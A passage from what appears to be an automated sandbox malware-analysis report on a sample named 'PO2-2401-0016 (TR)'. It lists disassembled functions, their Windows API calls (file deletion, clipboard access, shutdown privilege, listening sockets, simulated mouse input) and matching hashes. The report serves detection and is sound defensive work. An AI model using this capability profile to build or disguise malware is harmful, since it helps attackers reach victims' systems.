                                • FindClose.KERNEL32(00000000), ref: 001C98D5
                                  • Part of subcall function 001BDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001BDB00
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                • String ID: *.*
                                • API String ID: 2640511053-438819550
                                • Opcode ID: d95f823b25e9b20222e8a974e1e2374fc93aa01a22958857989c0ea7bc4a903f
                                • Instruction ID: b41d630f7744eeec3afe4bd7041c9a53935a670594df71fe497f711e8abff7e2
                                • Opcode Fuzzy Hash: d95f823b25e9b20222e8a974e1e2374fc93aa01a22958857989c0ea7bc4a903f
                                • Instruction Fuzzy Hash: B831E13250069EAADB10AFB4EC4DFDE77ACAF26320F108159E914A30D1DB71DE858A64
                                Function 001C8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?), ref: 001C8257
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 001C8267
                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001C8273
                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001C8310
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C8324
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C8356
                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001C838C
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C8395
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CurrentDirectoryTime$File$Local$System
                                • String ID: *.*
                                • API String ID: 1464919966-438819550
                                • Opcode ID: 6517d764fe60f7c8030f16a84aac0dcb98d34eb60eeb5e5be57fe7dbc5f55f35
                                • Instruction ID: 631fa9b0e7218815ae8d74771f6bacdd26f1ae552c13aeea003fb732116d9ff5
                                • Opcode Fuzzy Hash: 6517d764fe60f7c8030f16a84aac0dcb98d34eb60eeb5e5be57fe7dbc5f55f35
                                • Instruction Fuzzy Hash: 8D618D715143459FC710EF64D884EAEB3E8FFA9310F04881EF99987251EB31E949CB92
                                Function 001BD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00153AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00153A97,?,?,00152E7F,?,?,?,00000000), ref: 00153AC2
                                  • Part of subcall function 001BE199: GetFileAttributesW.KERNEL32(?,001BCF95), ref: 001BE19A
                                • FindFirstFileW.KERNEL32(?,?), ref: 001BD122
                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 001BD1DD
                                • MoveFileW.KERNEL32(?,?), ref: 001BD1F0
                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 001BD20D
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001BD237
                                  • Part of subcall function 001BD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,001BD21C,?,?), ref: 001BD2B2
                                • FindClose.KERNEL32(00000000,?,?,?), ref: 001BD253
                                • FindClose.KERNEL32(00000000), ref: 001BD264
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                • String ID: \*.*
                                • API String ID: 1946585618-1173974218
                                • Opcode ID: 33458b4cd60cdc31b09b5bf69154f045431e4ebdbba3880554a3e735624e2d1b
                                • Instruction ID: 10f6049485debdbb7d8d068a47dae82dcce15a862d70293689e2f54112e65920
                                • Opcode Fuzzy Hash: 33458b4cd60cdc31b09b5bf69154f045431e4ebdbba3880554a3e735624e2d1b
                                • Instruction Fuzzy Hash: 4A616E3180114DEBCF09EBE0ED929EDB7B5AF25305F6041A5E8127B192EB309F49CB61
                                Function 001CED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                • String ID:
                                • API String ID: 1737998785-0
                                • Opcode ID: 4491312509fa7833efb0df3316c5a74ad42b492f25fb97aa9e21489763a5ca9c
                                • Instruction ID: bc904c38d51d00df5a90d8906bfcdd02f592ed1869a5f704d955e96fb1c58be3
                                • Opcode Fuzzy Hash: 4491312509fa7833efb0df3316c5a74ad42b492f25fb97aa9e21489763a5ca9c
                                • Instruction Fuzzy Hash: DF419D31204251AFD720DF55D889F2ABBE1EF54358F14809DE8268FA62C735EC82CBD0
                                Function 001BE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001B170D
                                  • Part of subcall function 001B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001B173A
                                  • Part of subcall function 001B16C3: GetLastError.KERNEL32 ref: 001B174A
                                • ExitWindowsEx.USER32(?,00000000), ref: 001BE932
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                • String ID: $ $@$SeShutdownPrivilege
                                • API String ID: 2234035333-3163812486
                                • Opcode ID: d246d29cdf8dff98294542e5aa11ff17d8d71a180b02c0de9fedc5728404da5e
                                • Instruction ID: 250e3ff05877f975ac3ae262b09e96de3e3dc1b2fbcee6b75fd64deb8ed9de82
                                • Opcode Fuzzy Hash: d246d29cdf8dff98294542e5aa11ff17d8d71a180b02c0de9fedc5728404da5e
                                • Instruction Fuzzy Hash: 3E01D673610311AFEB5826B49C8ABFF72DCAB14758F160422F913E61D1D7A05C8885D0
                                Function 001D1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001D1276
                                • WSAGetLastError.WSOCK32 ref: 001D1283
                                • bind.WSOCK32(00000000,?,00000010), ref: 001D12BA
                                • WSAGetLastError.WSOCK32 ref: 001D12C5
                                • closesocket.WSOCK32(00000000), ref: 001D12F4
                                • listen.WSOCK32(00000000,00000005), ref: 001D1303
                                • WSAGetLastError.WSOCK32 ref: 001D130D
                                • closesocket.WSOCK32(00000000), ref: 001D133C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$closesocket$bindlistensocket
                                • String ID:
                                • API String ID: 540024437-0
                                • Opcode ID: 33eb14acc38c5fa0b4f8b4d93dd902e12cf82fe67d35e261b38bb9d8f45fd821
                                • Instruction ID: 2824b1ddf449cbe5d90ddc281371746f36721b56db1a5eca6484104ad14ef15a
                                • Opcode Fuzzy Hash: 33eb14acc38c5fa0b4f8b4d93dd902e12cf82fe67d35e261b38bb9d8f45fd821
                                • Instruction Fuzzy Hash: 89416E31600240BFD714DF64D9C4B29BBE6AF46318F288189E8568F392C771ED86CBE1
                                Function 0018B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 0018B9D4
                                • _free.LIBCMT ref: 0018B9F8
                                • _free.LIBCMT ref: 0018BB7F
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001F3700), ref: 0018BB91
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0022121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0018BC09
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00221270,000000FF,?,0000003F,00000000,?), ref: 0018BC36
                                • _free.LIBCMT ref: 0018BD4B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: 67976a178e3b98c5b7a248e7408fe8c31daf7bfe46ae6a324c2ec6a51fd30686
                                • Instruction ID: 2782d061b71345cf7349bb8c17baa7ebee3de4612e48d0593dbeca3664962830
                                • Opcode Fuzzy Hash: 67976a178e3b98c5b7a248e7408fe8c31daf7bfe46ae6a324c2ec6a51fd30686
                                • Instruction Fuzzy Hash: ABC11671908215AFDB24BF689CD1BAE7BB8EF61310F1442AAE894D7251EB309F41CF50
                                Function 001BD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00153AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00153A97,?,?,00152E7F,?,?,?,00000000), ref: 00153AC2
                                  • Part of subcall function 001BE199: GetFileAttributesW.KERNEL32(?,001BCF95), ref: 001BE19A
                                • FindFirstFileW.KERNEL32(?,?), ref: 001BD420
                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 001BD470
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001BD481
                                • FindClose.KERNEL32(00000000), ref: 001BD498
                                • FindClose.KERNEL32(00000000), ref: 001BD4A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                • String ID: \*.*
                                • API String ID: 2649000838-1173974218
                                • Opcode ID: 3adcb1df1dbc5a6b9ec2020a8c79e0ce764c2ffa2d527d828f350de9c6262f68
                                • Instruction ID: 8e1928faaa61526c1fe3562a54a7601e2343824e696ea88b82348d5551492a0a
                                • Opcode Fuzzy Hash: 3adcb1df1dbc5a6b9ec2020a8c79e0ce764c2ffa2d527d828f350de9c6262f68
                                • Instruction Fuzzy Hash: ED315071008385DBC304EF64D8918EF77E8BEA5315F844A2DF8E597191EB20AA0DC7A3
                                Function 0018E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                • Opcode ID: 93cb1c46b9e5e13d8024ebc4a86ea0e8a6ec144539d1401132164a8017ee99bf
                                • Instruction ID: 0d67b57e32c1b7215673050b53335ccb7e66ec660e97ca35eb17efe3af968a72
                                • Opcode Fuzzy Hash: 93cb1c46b9e5e13d8024ebc4a86ea0e8a6ec144539d1401132164a8017ee99bf
                                • Instruction Fuzzy Hash: E1C22A71E086288FDB29DE28DD447EAB7B5EB49305F1541EAD84DE7240E774AF828F40
                                Function 001C648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 001C64DC
                                • CoInitialize.OLE32(00000000), ref: 001C6639
                                • CoCreateInstance.OLE32(001EFCF8,00000000,00000001,001EFB68,?), ref: 001C6650
                                • CoUninitialize.OLE32 ref: 001C68D4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                • String ID: .lnk
                                • API String ID: 886957087-24824748
                                • Opcode ID: f269b60f4b412a028ac788b171de0271ba79ac33755ff22e8e12b310379f5315
                                • Instruction ID: 9b8994dd53980e347a7bd9ef2b3789f0887e634f7e7562bfa3f5a9a73bbdb77e
                                • Opcode Fuzzy Hash: f269b60f4b412a028ac788b171de0271ba79ac33755ff22e8e12b310379f5315
                                • Instruction Fuzzy Hash: 5BD13971508301AFC304EF24C881E6BB7E9FFA9705F50496DF9958B291EB70E949CB92
                                Function 001D22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32(?,?,00000000), ref: 001D22E8
                                  • Part of subcall function 001CE4EC: GetWindowRect.USER32(?,?), ref: 001CE504
                                • GetDesktopWindow.USER32 ref: 001D2312
                                • GetWindowRect.USER32(00000000), ref: 001D2319
                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001D2355
                                • GetCursorPos.USER32(?), ref: 001D2381
                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001D23DF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                • String ID:
                                • API String ID: 2387181109-0
                                • Opcode ID: 5cd8cd006655e815744ceaf1222fa96fc79b3939d7140bbd28bb6d39f21c4568
                                • Instruction ID: f9c07c8710d9d9a2e10f417a60e3b8b817a5220b3e61fe86275b92693d15ae2f
                                • Opcode Fuzzy Hash: 5cd8cd006655e815744ceaf1222fa96fc79b3939d7140bbd28bb6d39f21c4568
                                • Instruction Fuzzy Hash: 9C31CF72504355ABCB20DF54CC45B9BB7E9FF98314F00091AF9959B281DB34E949CBD2
                                Function 001C9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001C9B78
                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001C9C8B
                                  • Part of subcall function 001C3874: GetInputState.USER32 ref: 001C38CB
                                  • Part of subcall function 001C3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001C3966
                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001C9BA8
                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001C9C75
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                • String ID: *.*
                                • API String ID: 1972594611-438819550
                                • Opcode ID: 8abffcfa6d2883f4cbc07e65b5286961b5821130041000374da561e245b797cd
                                • Instruction ID: bfbe55b58f696b5d16cb5ea3b184bef5cf8e25d0ef12880b6e97f59811b68495
                                • Opcode Fuzzy Hash: 8abffcfa6d2883f4cbc07e65b5286961b5821130041000374da561e245b797cd
                                • Instruction Fuzzy Hash: F7417E7190420AEBCF14DFA4C889FEEBBB4EF25311F204159E815A6191EB31DE85CBA4
                                Function 0016997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00169A4E
                                • GetSysColor.USER32(0000000F), ref: 00169B23
                                • SetBkColor.GDI32(?,00000000), ref: 00169B36
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Color$LongProcWindow
                                • String ID:
                                • API String ID: 3131106179-0
                                • Opcode ID: 790e4faa0e81b3b50514defcbd69403a941cf8e452adcd6897fb16e8bf2a00ff
                                • Instruction ID: 44a15f85a88c5a92fd172d527e7b4458376fb4b2c2849127a40e9710d6f2890e
                                • Opcode Fuzzy Hash: 790e4faa0e81b3b50514defcbd69403a941cf8e452adcd6897fb16e8bf2a00ff
                                • Instruction Fuzzy Hash: 40A10671208444BFE728AAAD9C9CE7F369DDB53300B16021AF502C76D1CB359E62C672
                                Function 001D1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001D307A
                                  • Part of subcall function 001D304E: _wcslen.LIBCMT ref: 001D309B
                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001D185D
                                • WSAGetLastError.WSOCK32 ref: 001D1884
                                • bind.WSOCK32(00000000,?,00000010), ref: 001D18DB
                                • WSAGetLastError.WSOCK32 ref: 001D18E6
                                • closesocket.WSOCK32(00000000), ref: 001D1915
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                • String ID:
                                • API String ID: 1601658205-0
                                • Opcode ID: 524c8709c6816e60cba6a91478b6c1d9939614e38fd67cfebc168d441014fad2
                                • Instruction ID: d3abde47b7a8b9bf9dbb6058febb4e778c510e69e17f0cf00898e8a0277756ac
                                • Opcode Fuzzy Hash: 524c8709c6816e60cba6a91478b6c1d9939614e38fd67cfebc168d441014fad2
                                • Instruction Fuzzy Hash: 2351A071A00200AFDB10EF64D886F2A77E5AB58718F48805DF9155F3D3DB71AD428BE1
                                Function 001E1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                • String ID:
                                • API String ID: 292994002-0
                                • Opcode ID: 1ac8aafe6bade7db5094c1006df9814b1949fbdca79e962392a4f351bc1cb8bd
                                • Instruction ID: 19510b2c76c8a6d85591cca520aef6554ac492868229785db59ea51f18c7b4f8
                                • Opcode Fuzzy Hash: 1ac8aafe6bade7db5094c1006df9814b1949fbdca79e962392a4f351bc1cb8bd
                                • Instruction Fuzzy Hash: E3218231740A916FD7208F1BC894B6E7BA5BF95315B298068E846CB351C771EC82CB90
                                Function 00158060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                • API String ID: 0-1546025612
                                • Opcode ID: a280816d2047eeb631aab91fa2114c35197f7463e651139ff1a3ef53474c07a5
